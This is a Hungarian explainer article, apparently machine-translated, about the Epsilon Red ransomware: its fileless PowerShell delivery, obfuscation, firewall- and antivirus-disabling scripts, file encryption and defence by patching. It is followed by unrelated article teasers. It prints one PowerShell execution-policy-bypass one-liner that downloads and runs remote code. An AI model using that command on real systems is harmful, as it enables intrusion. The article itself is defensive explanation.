Mi az Epsilon Red ransomware?

Mi az Epsilon Red ransomware?

Javítottad már a szervereidet ?

Egy új zsarolóvírus- fenyegetés , az Epsilon Red, a vállalati adatközpontokban található, javítatlan Microsoft-alapú szervereket célozza meg. A Marvel képregényekből egy kevéssé ismert gonosztevőről elnevezett Epsilon Red-et nemrég fedezte fel a Sophos nevű kiberbiztonsági cég. Felfedezése óta a ransomware számos szervezetet támadott meg világszerte.

A fájl nélküli ransomware "elrejtőzik" a PowerShellben

A fájl nélküli ransomware a rosszindulatú programok egyik formája, amely a legális szoftverek kötegelésével hajtódik végre. A PowerShell- alapú fájl nélküli rosszindulatú programok a PowerShell azon képességét használják, hogy közvetlenül az eszköz memóriájába töltsenek be. Ez a funkció segít megvédeni a rosszindulatú programokat a PowerShell-szkriptekben az észleléstől.

Egy tipikus forgatókönyvben, amikor egy szkript fut, először az eszköz meghajtójára kell írni. Ez lehetővé teszi a végponti biztonsági megoldásoknak a parancsfájlok észlelését. Mivel a PowerShell ki van zárva a szabványos parancsfájl-végrehajtási folyamatokból, megkerülheti a végpontok biztonságát. Ezenkívül a bypass paraméter használata egy PowerShell-szkriptben lehetővé teszi a támadó számára, hogy megkerülje a hálózati parancsfájlokra vonatkozó korlátozásokat.

Példa a PowerShell megkerülési paraméterére:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

Mint látható, a PowerShell bypass paramétereinek tervezése viszonylag egyszerű.

Válaszul a Microsoft kiadott egy javítást a PowerShell-hez kapcsolódó, rosszindulatú programok távoli végrehajtásának sebezhetőségére. A tapaszok azonban csak annyira hatékonyak, amennyire használják őket. Sok szervezet enyhébb foltozási szabványokat alkalmaz, így környezetük sebezhetővé válik a támadásokkal szemben. Az Epsilon Red célja a sérülékenység ezen szintjének kihasználása.

Az Epsilon Red kettős hasznossága

Mivel az Epsilon Red a leghatékonyabb a javítatlan Microsoft-kiszolgálók ellen, a kártevő zsarolóvírusként és azonosítási eszközként használható. Az, hogy az Epsilon sikeres-e egy adott környezetben, nagyobb betekintést enged a támadóknak célpontjuk biztonsági képességeibe.

Ha az Epsilon sikeresen hozzáfér a Microsoft Exchange Server szerverhez, az azt jelzi, hogy a szervezet nem követi a bevált biztonsági javítási gyakorlatokat. A támadó számára ez azt mutatja, hogy az Epsilon milyen könnyen veszélyeztetheti a célpont többi környezetét.

Az Epsilon Red az Obfuscation funkciót használja a hasznos terhelés elrejtésére. Az obfuszkáció olvashatatlanná teszi a kódot, és a PowerShell rosszindulatú programjaiban használják, hogy elkerüljék a PowerShell-szkriptek jól olvashatóságát. A homályosítással a PowerShell-alias parancsmagok megnehezítik a víruskereső szoftverek számára a rosszindulatú szkriptek azonosítását a PowerShell-naplókban.

Mi az Epsilon Red ransomware?

Az Epsilon Red a leghatékonyabb a javítatlan Microsoft-kiszolgálók ellen

Az obfuszkált PowerShell-szkriptek azonban továbbra is azonosíthatók. A közelgő PowerShell Script támadás gyakori jele egy WebClient objektum létrehozása. A támadó egy WebClient objektumot hoz létre a PowerShell-kódban, hogy külső kapcsolatot létesítsen egy rosszindulatú kódot tartalmazó távoli URL- hez .

Ha egy szervezetet megtámadnak, nagyon kicsi annak a valószínűsége, hogy elegendő biztonsági intézkedéssel rendelkezik a zavart PowerShell-szkriptek észleléséhez. Ezzel szemben, ha az Epsilon Red nem sikerül behatolnia a szerverre, ez azt jelzi a támadónak, hogy a célpont hálózata gyorsan vissza tudja fejteni a PowerShell rosszindulatú programokat, így a támadás kevésbé értékes.

Epsilon Red kiberbehatolás

Az Epsilon Red funkciói nagyon egyszerűek. A szoftver Powershell-szkriptek sorozatát használja a szerverekbe való behatoláshoz. Ezek a PowerShell-szkriptek 1.ps1- től 12.ps1- ig vannak számozva . Az egyes PowerShell-szkriptek célja egy célkiszolgáló előkészítése a végső hasznos adathoz.

Az Epsilon Red minden PowerShell-szkriptjének saját célja van. Az Epsilon Red egyik PowerShell-szkriptje a cél hálózati tűzfalszabályainak feloldására szolgál. A sorozat másik szoftvere a cél víruskereső szoftverének eltávolítására szolgál .

Ahogy sejthető, ezek a parancsfájlok szinkronban működnek annak biztosítására, hogy a hasznos teher kézbesítése után a cél ne tudjon gyorsan leállítani a folyamatot.

Hasznos teher átvitele

Amint az Epsilon PowerShell-szkriptjei helyet adnak a végső hasznos terhelésnek, Red.exe kiterjesztésként terjesztik . Amikor belép a kiszolgálóra, a Red.exe átvizsgálja a szerver fájljait, és minden észlelt fájlhoz létrehoz egy listát a könyvtár elérési útjairól. A lista létrehozása után az alárendelt folyamatok jönnek létre a fő rosszindulatú programfájlból a listában szereplő minden egyes könyvtárútvonalhoz. Ezután minden ransomware alfájl titkosít egy könyvtár elérési utat a listafájlból.

Miután az Epson listáján szereplő összes mappaútvonal titkosításra került, egy .txt fájl marad, amely tájékoztatja a célpontot és kifejezi a támadó kérését. Ezenkívül a feltört szerverhez csatlakoztatott összes elérhető hálózati csomópont veszélybe kerül, és megnőhet a rosszindulatú programok hálózatba való bejutásának valószínűsége.

Ki áll az Epsilon Red mögött?

Mi az Epsilon Red ransomware?

Az Epsilon Red mögött támadók kiléte továbbra sem ismert

Az Epsilon Red mögött támadók kiléte továbbra sem ismert. Néhány nyom azonban a támadók származására utal. Az első nyom a rosszindulatú program neve. Az Epsilon Red egy X-Men gazember orosz származású történettel.

A második nyom a kód által hátrahagyott .txt fájl váltságdíj-jegyzetében rejlik. Hasonló a REvil nevű ransomware banda által hagyott jegyzethez. Ez a hasonlóság azonban nem utal arra, hogy a támadók ennek a bandának a tagjai lettek volna. A REvil egy RaaS (Ransomware as a service) műveletet működtet, amelyben a leányvállalatok fizetnek a REvilnek a rosszindulatú programjaihoz való hozzáférésért.

Védje magát az Epsilon Redtől

Az Epsilon Red eddig sikeresen behatolt a javítatlan szerverekre. Ez azt jelenti, hogy az egyik legjobb védelem az Epsilon Red és a hasonló zsarolóvírusok elleni rosszindulatú programok ellen a környezet megfelelő kezelésének biztosítása. Ezenkívül a PowerShell-szkriptek gyors visszafejtésére alkalmas biztonsági megoldás hasznos kiegészítője lehet a környezetnek.


Állítsa be a Linksys útválasztót statikus IP-címmel

Állítsa be a Linksys útválasztót statikus IP-címmel

A statikus IP-cím a számítógép vagy az útválasztó beállításaiban konfigurált rögzített IP-cím. Egyes internetszolgáltatók (ISP) megkövetelik, hogy statikus IP-címet adjon meg a számítógépén vagy az útválasztó TCP/IP-beállításaiban, hogy csatlakozhasson az internethez.

Hogyan lehet eltávolítani a PublicBoardSearch böngésző-gépeltérítőt

Hogyan lehet eltávolítani a PublicBoardSearch böngésző-gépeltérítőt

A fertőzés módja szerint a PublicBoardSearch a böngésző-gépeltérítő kategóriába tartozik. Ez egy olyan típusú rosszindulatú program, amelyet arra terveztek, hogy átvegye egy ismerős böngésző beállításait.

Nagy felbontású Apex Legends háttérképek gyűjteménye számítógépekhez

Nagy felbontású Apex Legends háttérképek gyűjteménye számítógépekhez

Nagy felbontású háttérképek gyűjteménye számítógép- és laptopfelhasználók számára teljes felbontásban Full HD-tól 4K-ig.

Mi az a Localhost? Miben különbözik a Localhost a 127.0.0.1-től?

Mi az a Localhost? Miben különbözik a Localhost a 127.0.0.1-től?

A Unix rendszer, más néven „visszacsatolás”, képes hálózati kommunikációt küldeni és fogadni magának egy virtuális hálózati eszközön keresztül. A számítógép képes üzeneteket küldeni magának, lehetővé téve a kommunikációt aktív hálózat nélkül.

5 ok, amiért érdemes ingyenes víruskereső szoftvert használni

5 ok, amiért érdemes ingyenes víruskereső szoftvert használni

Biztosan hallottad már azt a mondást, hogy azt kapod, amiért fizetsz, de mi a helyzet a víruskereső szoftverrel? Vásároljon szoftvercsomagokat az ingyenes védelmi megoldások helyett? Talán nem ez a helyzet, és itt van az ok!

Mi a különbség a Windows és a Mac víruskereső szoftverei között?

Mi a különbség a Windows és a Mac víruskereső szoftverei között?

A mai cikkben a Quantrimang összefoglalja a piacon lévő népszerű víruskereső szoftvermárkákat, és megnézi, miben különböznek a Windows PC-k és a macOS között.

4 dolog, amit a felhasználók látni szeretnének a Windows rendszerben 2021-ben

4 dolog, amit a felhasználók látni szeretnének a Windows rendszerben 2021-ben

Nem világos, hogy a Sun Valley mit hoz a legfelső szintű felhasználói felület változtatásokon és fejlesztéseken túl. Tehát íme, amit a felhasználók látni fognak a Windows 10 nagy Sun Valley frissítésétől, amikor az jövőre indul.

A Futtatás rendszergazdaként nem működő hiba javítása a Windows rendszerben

A Futtatás rendszergazdaként nem működő hiba javítása a Windows rendszerben

A Windows a Futtatás rendszergazdaként lehetőséget biztosít, amely lehetővé teszi a felhasználók számára, hogy rendszergazdai jogosultságokkal futtassák az alkalmazásokat és programokat. Használhatja számítógépe hibaelhárítására is. De mi van, ha ez a funkció hibásan működik, és elveszi a rendszergazdai jogokat?

A Lemezhibák javítása Windows rendszeren

A Lemezhibák javítása Windows rendszeren

A számítógép meghajtójával kapcsolatos hibák megakadályozhatják a rendszer megfelelő indítását, és korlátozhatják a hozzáférést a fájlokhoz és az alkalmazásokhoz.

Moduláris kártevő – Új lopakodó támadási módszer az adatok ellopására

Moduláris kártevő – Új lopakodó támadási módszer az adatok ellopására

Egyes rosszindulatú programváltozatok különböző modulokat használhatnak a célrendszerre gyakorolt ​​hatásuk megváltoztatására. Tehát mi az a moduláris kártevő, és hogyan működik?